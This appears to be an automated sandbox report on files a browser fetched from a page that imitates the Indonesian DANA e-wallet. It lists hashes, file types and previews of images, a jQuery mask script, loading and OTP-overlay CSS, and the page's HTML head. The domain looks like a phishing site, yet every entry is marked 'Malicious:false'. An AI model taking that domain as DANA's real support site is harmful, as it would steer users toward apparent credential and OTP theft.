                                                  Preview:.PNG........IHDR.......v.......@.....sRGB.........sBIT....|.d... .IDATx..{x.W}...h...m.b;..!.Sn.!@. ?.f..u.>.ko.%.t..R..h...m...]Z.Xd...r.bq)-."..N.+..e.dY.......w..d.y.}5..<zlI.....=.....p8.....p8.....p8.....p8....orr2Gr.S.6...W.*~w.kW....dnll,K..d.d..GR...+.R..s....~..y.If...'O.l#....N.8........R.......W.f.Y.....099...#G.d..<...;...@2.....^..8q.D+.*y.........@,.,P/..f.....T.;..*7 r.}0...s"..U?;..._...T.?..oU..@....Y.y.......)...8..>?44T.gO.Fc....o.}..Z.l....j.[.l....L2+"-.R..$."R.Z/..WJ=.....yG....;..JUs..CHz....|[kk.f...v..+`.@.f...L.<.E.Y.....1...~.3......n....i..........5`..[)...*.*.@... O. ".0......R.(..8.`.@AD.:.....f.....wgV.qV..dYDN.....A.|........*...l.FH.......l..{...v.y........M..3+sD.(...pLk.e...N.>=.q..%..X[.'.....x}}}..................BP.u)..@..q.GE.~...p.@1.&pkD}......d.......0s....E$.s...>...k.3"r...........X......8v.X...s}... ..A...T*...L.Kv...1.. y...<Nr....Z..i...A.|.........z.F.B..d...w.|..8..9@R.<E.(.{K.....$W..s
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                  Category:downloaded
                                                  Size (bytes):43109
                                                  Entropy (8bit):7.989443906274273
                                                  Encrypted:false
                                                  SSDEEP:768:ljv4EfImOLoLGgENjhDUwJ7SL6Hhp2wdp4citWb7OurgftCqG:ljvHz8oLGRtHZu6HhU7MbhqG
                                                  MD5:4126C0393B3B7DFA2800095CE6ECF338
                                                  SHA1:811D0A98523B12C1FA6255AA87B4D2101DAB1020
                                                  SHA-256:F7D0665DEA209EB1D41D46F66B7C2106F9E2F129178E530DFE258965C6D885D1
                                                  SHA-512:8BD2E2AF812ED272A51B74EF7799A78D4C69EF46742F8E54A6F4297013CEC6F893989249F23ABCC168374073AC700E9D5504827C4D2B702208ADF8118AEED98E
                                                  Malicious:false
                                                  Reputation:low
                                                  URL:https://bantuan-customer-care-dana.officio.asia/ast/img/hero.png
                                                  Preview:PK...........V...}.......1...Screenshot_20230612-162641-removebg-preview~2.png.ZUW...^.-h..'8...C...Hpww...]..w..A........p...s.L.<t.t}U..D(.Kb.~B.....R............S......IYR.P=Ir....$*..........|.H....g..y....5xA....[.ZA...p0.t7...q......W2...Rt7..;.....X...o};!....E....u....d........A...>.?...l.../.........dI|jW .c..:L.......P.lV.q.b.m..O.5w<.ATqE..C..t......z.B.....*@3%f.(^..........l..wm..dH..h..%.B.....9...r..?.-TC....L.sK..[.<..k5.z..n./....xy.s3.....;...f.. .>..*...b..Y.../UJ.7.;K....[RM.kQ..~....|u...T...o.|X...|z.O.#.o #........A.L..j..:V....Vz..X6}.....t.w...nd;<Q.L..[w......^..@,...L. ...n..../.7u...B..k.....3fF.<..4`(..N....X?o.u.A(.~r....Y.s..D#...I....L...V..}..F'....k...{Leu.Y@.K'.Tr.1... f+.n`Y.2..`Q.....-..!d.r...6....\r.m.)...I.~H....D/..."'{.............mB..?.q0..mC..Z..b.#....t....U............B..@.2L.s2.g#...f.$SB....2.+.o..(..o........d..2.v.....w....#.FT.:..........1.W.YS..x..F..s....Q..l.g.Pd..6...1#.%.......5..J..fM.$.
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:ASCII text, with very long lines (551)
                                                  Category:downloaded
                                                  Size (bytes):7920
                                                  Entropy (8bit):5.3601122776962535
                                                  Encrypted:false
                                                  SSDEEP:192:q3KIpiAIexCPJpl0DbintpGPiEvAheKevbtoNOO:q3hLjKrl0HitpGPQeKeDtMZ
                                                  MD5:2E961F240D376E0A83C885A07F00762E
                                                  SHA1:E9F1D4A792DC3FB06F8D65D68A607738F3B4070C
                                                  SHA-256:470A65FDD4C44FA96EF232ACB2A308CA73A3F17D6ACCC399D0C7A28A21D532D9
                                                  SHA-512:8358D44A3375BD2ACEB90B822A7D08C214A5524562774D2C402C6AEFA6B7DAB5443B94AABDBBB5DC4F9D79D32D6A7AD5BB7FB3FAF79E1A277731B47F2B30FF07
                                                  Malicious:false
                                                  Reputation:low
                                                  URL:https://bantuan-customer-care-dana.officio.asia/ast/jquery.mask.min.js
                                                  Preview:var $jscomp={scope:{},findInternal:function(a,l,d){a instanceof String&&(a=String(a));for(var p=a.length,h=0;h<p;h++){var b=a[h];if(l.call(d,b,h,a))return{i:h,v:b}}return{i:-1,v:void 0}}};$jscomp.defineProperty="function"==typeof Object.defineProperties?Object.defineProperty:function(a,l,d){if(d.get||d.set)throw new TypeError("ES3 does not support getters and setters.");a!=Array.prototype&&a!=Object.prototype&&(a[l]=d.value)};.$jscomp.getGlobal=function(a){return"undefined"!=typeof window&&window===a?a:"undefined"!=typeof global&&null!=global?global:a};$jscomp.global=$jscomp.getGlobal(this);$jscomp.polyfill=function(a,l,d,p){if(l){d=$jscomp.global;a=a.split(".");for(p=0;p<a.length-1;p++){var h=a[p];h in d||(d[h]={});d=d[h]}a=a[a.length-1];p=d[a];l=l(p);l!=p&&null!=l&&$jscomp.defineProperty(d,a,{configurable:!0,writable:!0,value:l})}};.$jscomp.polyfill("Array.prototype.find",function(a){return a?a:function(a,d){return $jscomp.findInternal(this,a,d).v}},"es6-impl","es3");.(function(a,l,d
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:downloaded
                                                  Size (bytes):140
                                                  Entropy (8bit):4.948388501513804
                                                  Encrypted:false
                                                  SSDEEP:3:H4ytlWKTJoAwtTkdpthO+kxhRNPDhHIJ8pp5NoUrW/:YytlWsq4ptM+g3dtoJ8p3qUrW/
                                                  MD5:C1869FC4784959A615BD8AFDF0BEA362
                                                  SHA1:4694CAB13838B8C9811E389BBCE3D18E19D6C212
                                                  SHA-256:CC01EAE1A899FAF2C2F71C5CE1D5033603C9DDB7DC04503A4EAB28E03599FAE0
                                                  SHA-512:5C4FCE34D703FAE5C0270A726AEB13B360C7FEDE98F9F97EB29DC81783EE48A2EE86BAD4EF3BA5E1BE286C3836056CB7132FF497A27775DA31527C8EFE8E0C4A
                                                  Malicious:false
                                                  Reputation:low
                                                  URL:https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTE3LjAuNTkzOC4xMzISEAnAJT1Uj07bNhIFDZNbwk0SMwmSi607Dz9wfxIFDR6dICMSBQ1iprDeEgUNTjE4MRIFDWegdasSBQ1fK4b_EgUNXN984RIlCe2MPqnqM8OkEgUN3mmdXRIFDR2xUC0SBQ0AjZ7TEgUND7ggpg==?alt=proto
                                                  Preview:CgkKBw2TW8JNGgAKNgoHDR6dICMaAAoHDWKmsN4aAAoHDU4xODEaAAoHDWegdasaAAoHDV8rhv8aAAoHDVzffOEaAAokCgcN3mmdXRoACgcNHbFQLRoACgcNAI2e0xoACgcND7ggphoA
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:PNG image data, 360 x 200, 8-bit/color RGBA, non-interlaced
                                                  Category:dropped
                                                  Size (bytes):16542
                                                  Entropy (8bit):7.94673343485081
                                                  Encrypted:false
                                                  SSDEEP:384:rD/OMxpVl1O5h+X4cTIceArJp3/JhcrScEYkQq2Peex:rDjxpn1O5h+IcVeAp3fcrxvPdx
                                                  MD5:6E77DF79B301B9FB95FDF50D66E3CEB7
                                                  SHA1:1C93476FCCF582D5EA0FA88EC8B1BECC00D9EDB5
                                                  SHA-256:4262DC8D42209D7E2A597F7F1098880E75AD0F6A53A66DA1A7BD094A5F778199
                                                  SHA-512:995F53840326CC7C3F42E9DCD2CCDFDD8278FB100158D94B4B36D7799499E5FE03F34D7880713043ED5536EA240866DB338A2EC3FE9B6BF9FCDDFF1330EB1CC1
                                                  Malicious:false
                                                  Reputation:low
                                                  Preview:.PNG........IHDR...h..........{.....sRGB.........sBIT....|.d... .IDATx..y.$U........t.6.6;.......'...8*.(.632"n.:*.......b...~......t....KUVe..............<..R.7N.q..s.9...@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ ...........@V$..].O;....x.....H~.@..kf..+y ..AA......t........v.f..n...7.HR..W..(R....@......G__................G.f....#..I_w.-.Tt..9.VS.n.9w......N...5kf$..@`L..00fH....^.<.8..UR.`6:.S......>..o.-[v.>...7*........U$........*.....1./..3..p-.1Q.....t`T.4.x>p..W...l.... /..........1.+0...oG`B#)....\.x...&.s.E.....137.".&3..E..s$..[.....1&.x.>*.7....l.....L..&0.......b...s=.l.n..1....<.I.d}q..L.....}.[.Y...........7.l.....$....6.:.....Q.$..H......U.X......M.X.{...^..d.cj....l@.....*....*.v..Q@~.......|.X.2.....".M..$.*...~..4O....>.zZx...s7Iz...:........I.B.U.......F.~.V...$....VI..yO..A..t.)......;...Z..3f.*i...l..Yo.. .J>.....02....7p.sn?I_4..#p..$%......7..J|\.HP.6K*..V`#..>......BRw..'.r....'.vI]fv(#....6.....S#x.@
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:HTML document, ASCII text, with very long lines (9360)
                                                  Category:downloaded
                                                  Size (bytes):9719
                                                  Entropy (8bit):5.272029227253181
                                                  Encrypted:false
                                                  SSDEEP:96:Tmn2dWu62dcuquy42o3aN3BXOOrczTd/B9pKbLikfiDbZd63iDbEkjogKxFYB23N:6S6HlxMzx7uikfi/Zk3i/VwYIzYxWJ
                                                  MD5:A314A849973A3D8F0DF09D823126D91A
                                                  SHA1:DEB18EB4206AE0ED0D39387AF99318375A97C8C9
                                                  SHA-256:2025A9A6E50D5CC752E85912A6C2203A7942C6F110B1213962DF98A56243E257
                                                  SHA-512:C47D392D2FA9C86CF5796EF89F2B43F79408265CF693BB7C56C644A233816466EBAFCA3D83EC1D21A09D02DF92E25A98DEA0B6F603C7EFE61685102D218C3EE0
                                                  Malicious:false
                                                  Reputation:low
                                                  URL:https://bantuan-customer-care-dana.officio.asia/
                                                  Preview:<!DOCTYPE html><html lang="en"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1.0, user-scalable=0"><meta http-equiv="X-UA-Compatible" content="ie=edge"><title>DANA - Apa pun transaksinya selalu ada DANA</title><meta property="og:title" content="DANA - Apa pun transaksinya selalu ada DANA"><meta property="twitter:title" content="DANA - Apa pun transaksinya selalu ada DANA"><meta property="twitter:card" content="summary_large_image"><meta property="og:image:type" content="image/jpeg"><meta property="og:image" content="https://i.top4top.io/p_3116s4o1x0.jpg" ><meta property="twitter:image:src" content="https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcSdzB_zbo4bA4kj0917JUPNAy0NJUJsosd7NM_4gemkkcCxSlnzB0EUHLA&s=10"><meta property="og:url" content="https://dana.id"><meta property="og:description" content="DANA adalah bentuk baru uang tunai yang lebih baik. Transaksi apapun, berapapun dan dimanapun jadi mudah bersama DANA. Ambil bagian dalam
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:PNG image data, 300 x 300, 8-bit gray+alpha, non-interlaced
                                                  Category:downloaded
                                                  Size (bytes):7863
                                                  Entropy (8bit):7.944853026641418
                                                  Encrypted:false
                                                  SSDEEP:192:Oxyj5jciyprh/k6wSpBFcrApNmH58Byn7w3tdZvdsqVhwN5RxADRPtkch:OxsjQpSIFaAqH58Byn7wZvdZVc5R4vFh
                                                  MD5:BF1D4A90DE7E29B2BE55237982CB30B4
                                                  SHA1:EF942049631B598767FDA52D54458B9F9680EE87
                                                  SHA-256:46518758F002D85CFF9220609163F23B7E9F8F2721561D1E0BA79C4F17425C58
                                                  SHA-512:3AC1AB4324711A94DDD9F5BC24D5E2CB3948073602AD5E52F0B2C7B61C1DF072ACA6FB9E015DA9E113071A353F7B7E1493EB7F2C9CDBBB6417938FAB17909B09
                                                  Malicious:false
                                                  Reputation:low
                                                  URL:https://bantuan-customer-care-dana.officio.asia/ast/img/load_bg.png
                                                  Preview:.PNG........IHDR...,...,......tF.....gAMA......a.... cHRM..z&..............u0...`..:....p..Q<....bKGD.........tIME..........c....IDATx...odGv..son.L..-.o.HU%..T.[Rkma...[......<..4.`..../.4....0.c...n`..I-...V..ZT{...o.%....".d.......(V....'N...4.................,,,2(2X$I.'N..P(.+......A.....i#......L..@.~....X(2.H?..`.9bX.Yg.....I-.. .I=.4..>....m{.Y!.s+'..I.Y&.*C.. cw..M-..C.v.i.....x...rwaB.[M.'.:c,...k..n.jq..%.h..N:..@..........S,...q.......v..C0....v...M..e..b..n..U..!..M+..P..q..-@.M..a..b..~./a...9C;Mx..twG/-@.%f..,K...*.~L..0H.-...Q.a..X`...X;.#.. . ..`.z...R.B..#.1...).:n.K..........E..s<.!s$..Ni.q'..r.>B...S.!...q.aV...Q+.>.V............d.[.c.}.t..|tr..4!.k.# (...&S....$.:.9..A..?U(.l0.mF..0.....8.s..)I.DH0.5....w....r....|.JV\W.v....,?'.H.>j....IF......sXA..I?/0X.._>.$.|.#.F.*,..K<MH.*..:w..)g..3...y.....B.%np.E......g.D;..U....|.wN.%,..W9.W......|...Z...;...o.awA\.A..xYtNt.).29..\..IW..P..MV....V.?.u...1....A.,.iwQ. ,..x....q.....t...
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:ASCII text, with very long lines (551)
                                                  Category:dropped
                                                  Size (bytes):7920
                                                  Entropy (8bit):5.3601122776962535
                                                  Encrypted:false
                                                  SSDEEP:192:q3KIpiAIexCPJpl0DbintpGPiEvAheKevbtoNOO:q3hLjKrl0HitpGPQeKeDtMZ
                                                  MD5:2E961F240D376E0A83C885A07F00762E
                                                  SHA1:E9F1D4A792DC3FB06F8D65D68A607738F3B4070C
                                                  SHA-256:470A65FDD4C44FA96EF232ACB2A308CA73A3F17D6ACCC399D0C7A28A21D532D9
                                                  SHA-512:8358D44A3375BD2ACEB90B822A7D08C214A5524562774D2C402C6AEFA6B7DAB5443B94AABDBBB5DC4F9D79D32D6A7AD5BB7FB3FAF79E1A277731B47F2B30FF07
                                                  Malicious:false
                                                  Reputation:low
                                                  Preview:var $jscomp={scope:{},findInternal:function(a,l,d){a instanceof String&&(a=String(a));for(var p=a.length,h=0;h<p;h++){var b=a[h];if(l.call(d,b,h,a))return{i:h,v:b}}return{i:-1,v:void 0}}};$jscomp.defineProperty="function"==typeof Object.defineProperties?Object.defineProperty:function(a,l,d){if(d.get||d.set)throw new TypeError("ES3 does not support getters and setters.");a!=Array.prototype&&a!=Object.prototype&&(a[l]=d.value)};.$jscomp.getGlobal=function(a){return"undefined"!=typeof window&&window===a?a:"undefined"!=typeof global&&null!=global?global:a};$jscomp.global=$jscomp.getGlobal(this);$jscomp.polyfill=function(a,l,d,p){if(l){d=$jscomp.global;a=a.split(".");for(p=0;p<a.length-1;p++){var h=a[p];h in d||(d[h]={});d=d[h]}a=a[a.length-1];p=d[a];l=l(p);l!=p&&null!=l&&$jscomp.defineProperty(d,a,{configurable:!0,writable:!0,value:l})}};.$jscomp.polyfill("Array.prototype.find",function(a){return a?a:function(a,d){return $jscomp.findInternal(this,a,d).v}},"es6-impl","es3");.(function(a,l,d
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:PNG image data, 382 x 112, 8-bit/color RGBA, interlaced
                                                  Category:downloaded
                                                  Size (bytes):12786
                                                  Entropy (8bit):7.97367666555636
                                                  Encrypted:false
                                                  SSDEEP:192:olyA9pk9pGYsPVMm80Y0xf43FmSqf6x0LUYMTo2OZ9:olyA9pk9kYaV+0t43Tqf6KU/82Of
                                                  MD5:6FD5A7D18A8F7C04BC5EFFCDC5235987
                                                  SHA1:C4852C577F44FCDF78FB439A30EA2C6C6983B140
                                                  SHA-256:C67E5431F9C00BB690EA8B8ADD63D5CA9250BF2925F2C2A691EEEE498AC75853
                                                  SHA-512:13E05A6F89B8110F1867EFBBC6A7BF216471FF5CAD3739AC3C34E30AAED670844ED8DE5B220EB449B174A272BCABEF07A96F13F936A34AEDD754E6A8ED3CC991
                                                  Malicious:false
                                                  Reputation:low
                                                  URL:https://bantuan-customer-care-dana.officio.asia/ast/img/dana_logo.png
                                                  Preview:.PNG........IHDR...~...p.....n.+.....gAMA......a...1.IDATx..}...5....., ....U.J.A..X.D...'... ..G.......R.."E.#.R...A....R..{....I..m...;3....L&999..2...1..s..1....tFIn.g.c...c..r.f.......Dg..x...ETE.p..O...O......x.)=.......;.....<yr...."...,sv5...e..].bEgF...s..Y..?..6..iX.?.x?.............7n...&....p....G..W.Z5..t.{..EiX<])......0#.%K....?.~wc$Kd.2:OB.R...t\.....':z...,..G.7. ..Kqet..bE._}..,1...g.t.....OO..^.%6..h.U>..-|F......EX.l.. .c<.M.6.:]cbb..n.z....|.....3gN..0...\H..s.#~.........M<.o.3........f.,......E.w.[.*......[....!...%H.+..=z.*>.e.g..._....o[.c.44))..o>.m...G...L.ONN...&.......(:::j.q....=.......Ii...{..aq,.]..>..@..Wa<.......e.)o.x<.8..h........Y<]Y8F...=...{.U..+W......hX..z...{.+.Tt.h/].d:.:q..1#/.3...Y../{.5j.=.4,......2/:..<1.'..3..g....3:./...,.J.m.|.v..._4..v.W0..2..xX..Op...k,...gf..z...=./M.g......"...^..U..<HP....1].n....tO4|.=..<.%c.|f..p..y>d.B.._2.(..{..Y.jC..+AU.ILL.GT(c.Y.....b.2..U}>~...1k..#.3.'.
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:ASCII text, with very long lines (1561), with no line terminators
                                                  Category:downloaded
                                                  Size (bytes):1561
                                                  Entropy (8bit):4.844867479268656
                                                  Encrypted:false
                                                  SSDEEP:48:NYNPerlBvFVu3DuYVk7iGviVN3DuYVkMpcJIJ+JzJ9MAD:NXn9NM4
                                                  MD5:553A4FEACEBE4A339E3F83B082684FF8
                                                  SHA1:7334803536F6429C43AD344DA92E22414E5882C2
                                                  SHA-256:94E570A73C7171A271962B2C59739196B2101BBA6CE3257E1E60743013CDAF32
                                                  SHA-512:8DDCD2ED8ABA26B91608713162AC771E283645BFE4C89F8596C363DA05BA0BB31AA4AF608CFD9D0883725F7EE860589F75C73F9FAA20B48D930FB8BFE0E8FF05
                                                  Malicious:false
                                                  Reputation:low
                                                  URL:https://bantuan-customer-care-dana.officio.asia/ast/3fadc676582b9542004b502ee03df3a3.css
                                                  Preview:/*********************/.process {top: 0;left: 0;right: 0;position: fixed;display: flex;justify-content: center;align-items: center;background: #0000005b;z-index: 999999999;width: 100%;height: 100%;}.loading {margin-top: -50px;position: absolute;display: flex;justify-content: center;align-items: center;}.loading img {width: 50px;}.loading .spinner{position: absolute;width: 35px;animation: spin 1s linear infinite;-webkit-animation: spin 1s linear infinite;-moz-animation: spin 1s linear infinite;-ms-animation: spin 1s linear infinite;-o-animation: spin 1s linear infinite;}.loadingOtp {background: #fff;width: 100%;z-index: 9999;position: absolute;display: flex;justify-content: center;align-items: center;}.loadingOtp img {width: 50px;}.loadingOtp .spinner{position: absolute;width: 35px;animation: spin 1s linear infinite;-webkit-animation: spin 1s linear infinite;-moz-animation: spin 1s linear infinite;-ms-animation: spin 1s linear infinite;-o-animation: spin 1s linear infinite;}@keyframes s
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:PNG image data, 480 x 118, 8-bit/color RGBA, non-interlaced
                                                  Category:downloaded
                                                  Size (bytes):10588
                                                  Entropy (8bit):7.920893955198491
                                                  Encrypted:false
                                                  SSDEEP:192:M6+HXQMbqmgEy9n5LzCldeYK61VX+oqwckpZ7QSYQv/95F9aWfwNpkcRe/:M6gzb7g79nUHeYK6fJn7MSYU/9JPwNe5
                                                  MD5:3DC459976E4F7086419105435A80FC25
                                                  SHA1:4A79A70AE98BE7B6386DDDE8609D83EEE4777373
                                                  SHA-256:8AF7F1691E018BFC400432DFC61455F26F63226AB369E675C80CEF5A93334E87
                                                  SHA-512:E83D13B741E2C2E5AC38CB498485EB8C0E7D31E6D182DEB8A9AE54A3F306C301FC984AE6BC353142AC1FF7531B8C4A7E21D6711C23DD5F548EF38300208021C2
                                                  Malicious:false
                                                  Reputation:low
                                                  URL:https://bantuan-customer-care-dana.officio.asia/ast/img/dana_text.png
                                                  Preview:.PNG........IHDR.......v.......@.....sRGB.........sBIT....|.d... .IDATx..{x.W}...h...m.b;..!.Sn.!@. ?.f..u.>.ko.%.t..R..h...m...]Z.Xd...r.bq)-."..N.+..e.dY.......w..d.y.}5..<zlI.....=.....p8.....p8.....p8.....p8....orr2Gr.S.6...W.*~w.kW....dnll,K..d.d..GR...+.R..s....~..y.If...'O.l#....N.8........R.......W.f.Y.....099...#G.d..<...;...@2.....^..8q.D+.*y.........@,.,P/..f.....T.;..*7 r.}0...s"..U?;..._...T.?..oU..@....Y.y.......)...8..>?44T.gO.Fc....o.}..Z.l....j.[.l....L2+"-.R..$."R.Z/..WJ=.....yG....;..JUs..CHz....|[kk.f...v..+`.@.f...L.<.E.Y.....1...~.3......n....i..........5`..[)...*.*.@... O. ".0......R.(..8.`.@AD.:.....f.....wgV.qV..dYDN.....A.|........*...l.FH.......l..{...v.y........M..3+sD.(...pLk.e...N.>=.q..%..X[.'.....x}}}..................BP.u)..@..q.GE.~...p.@1.&pkD}......d.......0s....E$.s...>...k.3"r...........X......8v.X...s}... ..A...T*...L.Kv...1.. y...<Nr....Z..i...A.|.........z.F.B..d...w.|..8..9@R.<E.(.{K.....$W..s
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:PNG image data, 200 x 200, 8-bit gray+alpha, non-interlaced
                                                  Category:dropped
                                                  Size (bytes):5078
                                                  Entropy (8bit):7.9162479598001845
                                                  Encrypted:false
                                                  SSDEEP:96:SlG0ml1KICtII+3ok+yNdfBPA00KFY14dooNVO+3RrSGo2XR+nPRtu7MrprxeA12:iGrkIPYk+yNl0K+142+ZSpEEnPYM9xe3
                                                  MD5:E8E4E4432355A07040A7327673850223
                                                  SHA1:B07F6CFAACB6A2093778B08DD8D9B8F7D718C119
                                                  SHA-256:50B4BAD00572D07C6158459A5CB93B1B3F9BDEA95D393AA56970AFDED2F58913
                                                  SHA-512:7A88F02C1B3A28D852476219C80A3C5493FDC94339B19B3A2FC2C6F9EC9A8661636CD26E43CEC0A601B668AC1C5F02D3965832F89E76E4574953860EB945C636
                                                  Malicious:false
                                                  Reputation:low
                                                  Preview:.PNG........IHDR..............Qf.....gAMA......a.... cHRM..z&..............u0...`..:....p..Q<....bKGD.........tIME...............IDATx...{....ZzQ...Z; .C.m.x.m.../.x..?;6Nf..N....v...m..$..!.[.VWW..u.....kU.....R.{..t...U.O...>4.0...'..8.(R....%......I..$.q...]$H.B...E..I.M6...l.M..P..$..!.0S...L3F?I,..D....|U.U.;.p.@.',.G,.B.....A.(TX.g..y..Ls...0pI1....^..x8..b.e......p;...!.BE.)^.....I..N..{..p.|b....s.0.*.N2..m..*.p...".$101(aV...00..`.b...fL.[...<\\ .0.^`.9.2...4...Y..L....@.8.&...1E..pq.%...l.e..r..E....).H..&I..66...>...e.;....2L$.*d..:W...B.-.a.[......s..e."%.*....$F....c.12....?..<.6.g.......8..).Hp..\..P*.q,\.,.#...?3.Fp.[...... .0cd.....!...:.....X,l...4Y.W....`...M...3..kn.j...x.M>5.`.c......6s..|9.i.......5>.E..[.'.<3|..|.Z...EM7#<...X.....X.G....P.Q<.u>.<)../b..y...........f..L.....a...._m.C*..+|.y.... ....?.-.!.E.-i.y.QR.G*uK.G.e..:.-Y...J........1........jf...>N0I.*......./.W.6..U=.\...S..[|...-.!.R...c......-.y.G....e.b..
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:PNG image data, 382 x 112, 8-bit/color RGBA, interlaced
                                                  Category:dropped
                                                  Size (bytes):12786
                                                  Entropy (8bit):7.97367666555636
                                                  Encrypted:false
                                                  SSDEEP:192:olyA9pk9pGYsPVMm80Y0xf43FmSqf6x0LUYMTo2OZ9:olyA9pk9kYaV+0t43Tqf6KU/82Of
                                                  MD5:6FD5A7D18A8F7C04BC5EFFCDC5235987
                                                  SHA1:C4852C577F44FCDF78FB439A30EA2C6C6983B140
                                                  SHA-256:C67E5431F9C00BB690EA8B8ADD63D5CA9250BF2925F2C2A691EEEE498AC75853
                                                  SHA-512:13E05A6F89B8110F1867EFBBC6A7BF216471FF5CAD3739AC3C34E30AAED670844ED8DE5B220EB449B174A272BCABEF07A96F13F936A34AEDD754E6A8ED3CC991
                                                  Malicious:false
                                                  Reputation:low
                                                  Preview:.PNG........IHDR...~...p.....n.+.....gAMA......a...1.IDATx..}...5....., ....U.J.A..X.D...'... ..G.......R.."E.#.R...A....R..{....I..m...;3....L&999..2...1..s..1....tFIn.g.c...c..r.f.......Dg..x...ETE.p..O...O......x.)=.......;.....<yr...."...,sv5...e..].bEgF...s..Y..?..6..iX.?.x?.............7n...&....p....G..W.Z5..t.{..EiX<])......0#.%K....?.~wc$Kd.2:OB.R...t\.....':z...,..G.7. ..Kqet..bE._}..,1...g.t.....OO..^.%6..h.U>..-|F......EX.l.. .c<.M.6.:]cbb..n.z....|.....3gN..0...\H..s.#~.........M<.o.3........f.,......E.w.[.*......[....!...%H.+..=z.*>.e.g..._....o[.c.44))..o>.m...G...L.ONN...&.......(:::j.q....=.......Ii...{..aq,.]..>..@..Wa<.......e.)o.x<.8..h........Y<]Y8F...=...{.U..+W......hX..z...{.+.Tt.h/].d:.:q..1#/.3...Y../{.5j.=.4,......2/:..<1.'..3..g....3:./...,.J.m.|.v..._4..v.W0..2..xX..Op...k,...gf..z...=./M.g......"...^..U..<HP....1].n....tO4|.=..<.%c.|f..p..y>d.B.._2.(..{..Y.jC..+AU.ILL.GT(c.Y.....b.2..U}>~...1k..#.3.'.
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:PNG image data, 200 x 200, 8-bit/color RGBA, non-interlaced
                                                  Category:dropped
                                                  Size (bytes):8484
                                                  Entropy (8bit):7.924229044420093
                                                  Encrypted:false
                                                  SSDEEP:192:ZC238elt8IjGXdEaokt/9MmhXAHm2yPfBJbA7nXAZVGMGQC2:sg/lt88Gttf7XAmzPXADWGo
                                                  MD5:74ADB66E545A68DF7E5A0442A02FA8E7
                                                  SHA1:A1692D3BFBDE3C0CB3A8BC9B9B1FB2DE4D570E85
                                                  SHA-256:4285DB40C51CC53230CAB0490DF40566E285B48FB2B2E4729B42FF2A26C74480
                                                  SHA-512:44FFC291A4790B3F0CC6F78CC170F882975A7902BC14035F8108D28CBF304034553E2AB5BD4BD1D7D2BF78F8EF31EDA4ADBB89A66604B56B610D2908F338F8CE
                                                  Malicious:false
                                                  Reputation:low
                                                  Preview:.PNG........IHDR..............X......sRGB.........sBIT....|.d... .IDATx..{.%uu.....y...o.)2....x..A4..Dc.....WM.E.....d-....jn...L..(H@...&....Z....4.=.>U.{...._WW.SuN.Su....f...c.~.~....b.X,...b.X,...b.X,...b.X,...b.X,...b.X,...b.X,..eA#E......8....5.J."....%.H..W.............o./...&H.......FT.#y?.S.~f.%../!....S!R.$o...;..2.,p.....\.B.CI>@....c.......x3...........-L..M/..H.&...,/Z.V!...._<f...#E..-X.I..K.....-K...p..l+Z..c.$....V..-K...p....-HYq...L...`..C9.`..QU}".cY"X..@...$.......D.h.J...)....122.z.e....-KY 9,"..n..mAH^.l...1..Y.`/...-K.Xp-H......hY...]"r.B^?YP-....x....9..;88..hY.b.(......l5[.Y.j...s..........................)...pv.r.#n....-D....B.a.'.-G...`3._.x..N.;&&&.........t.R.~...P........8JUOv..e........"..x....B...G.-G. y..|ydd......`.o..W....8LD.}.</....N*Z.. .).7......,..Z..yC.nt.rx......Y..+..<.Z.g.-G.(|.........l..g.u}..Z.V..x...$..........V.........h;d.t..g...k..".,..%.^.O..T..j ..).....{..7......a.9...]Gr..lI%.).o.....
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:PNG image data, 200 x 200, 8-bit gray+alpha, non-interlaced
                                                  Category:downloaded
                                                  Size (bytes):5078
                                                  Entropy (8bit):7.9162479598001845
                                                  Encrypted:false
                                                  SSDEEP:96:SlG0ml1KICtII+3ok+yNdfBPA00KFY14dooNVO+3RrSGo2XR+nPRtu7MrprxeA12:iGrkIPYk+yNl0K+142+ZSpEEnPYM9xe3
                                                  MD5:E8E4E4432355A07040A7327673850223
                                                  SHA1:B07F6CFAACB6A2093778B08DD8D9B8F7D718C119
                                                  SHA-256:50B4BAD00572D07C6158459A5CB93B1B3F9BDEA95D393AA56970AFDED2F58913
                                                  SHA-512:7A88F02C1B3A28D852476219C80A3C5493FDC94339B19B3A2FC2C6F9EC9A8661636CD26E43CEC0A601B668AC1C5F02D3965832F89E76E4574953860EB945C636
                                                  Malicious:false
                                                  Reputation:low
                                                  URL:https://bantuan-customer-care-dana.officio.asia/ast/img/load_spin.png
